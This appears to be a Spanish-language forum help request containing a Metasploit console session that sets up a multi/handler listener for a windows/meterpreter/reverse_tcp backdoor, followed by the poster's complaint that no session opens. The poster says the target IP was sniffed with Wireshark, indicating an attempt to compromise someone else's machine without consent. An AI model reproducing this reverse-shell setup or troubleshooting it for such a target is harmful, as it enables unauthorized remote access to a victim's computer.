msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpeter/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxxx
lhost => 192.168.0.101
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
- Started reverse handler on xxx:4444
- Starting the payload handler...
y no me crea el backdoor no saben a que se deba en lhost puse la ip de la victima pero unos dicen que es la ip local ahi me confudo algo omo vi en un tutorial y no creo que sea problema de red no estoy haciendo sesion con nada almenos que se tarda mucho pero ya llevo asi unos 20 minutos y nada y no cosigo la sesion meterpreter como en el tutorial,la ip que trato de hacer sesion es una que sniffie con wireshark
saludos